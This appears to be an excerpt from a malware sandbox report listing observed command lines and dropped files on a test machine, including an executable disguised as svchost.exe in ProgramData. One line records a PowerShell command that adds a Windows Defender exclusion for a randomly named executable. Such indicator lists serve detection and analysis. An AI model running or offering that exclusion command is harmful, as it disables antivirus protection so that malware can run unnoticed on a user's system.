cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force |
cmdline | C:\ProgramData\svchost.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\File.exe |
file | C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe |
file | C:\ProgramData\svchost.exe |
file | C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\File.exe |